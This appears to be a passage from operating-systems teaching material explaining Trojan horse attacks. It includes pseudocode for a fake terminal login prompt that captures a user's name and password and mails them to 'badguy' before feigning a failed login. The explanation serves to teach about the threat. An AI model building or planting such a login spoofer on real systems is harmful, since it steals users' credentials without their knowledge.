Break-in techniques come in numerous forms. One general category of attack that comes in a great variety of disguises is the Trojan Horse scam. The name comes from Greek mythology. The ancient Greeks were attacking the city of Troy, which was surrounded by an impenetrable wall. Unable to get in, they left a huge wooden horse outside the gates as a “gift'’ and pretended to sail away. The Trojans brought the horse into the city, where they discovered that the horse was filled with Greek soldiers who defeated the Trojans to win the Rose Bowl (oops, wrong story). In software, a Trojan Horse is a program that does something useful–or at least appears to do something useful–but also subverts security somehow. In the personal computer world, Trojan horses are often computer games infected with “viruses.'’

Here’s the simplest Trojan Horse program I know of. Log onto a public terminal and start a program that does something like this:

print("login:");

name = readALine();

turnOffEchoing();

print("password:");

passwd = readALine();

sendMail("badguy",name,passwd);

print("login incorrect");

exit();

A user waking up to the terminal will think it is idle. He will attempt to log in, typing his login name and password. The Trojan Horse program sends this information to the bad guy, prints the message login incorrect and exits. After the program exits, the system will generate a legitimate login: message and the user, thinking he mistyped his password (a common occurrence because the password is not echoed) will try again, log in successfully, and have no suspicion that anything was wrong. Note that the Trojan Horse program doesn’t actually have to do anything useful, it just has to appear to.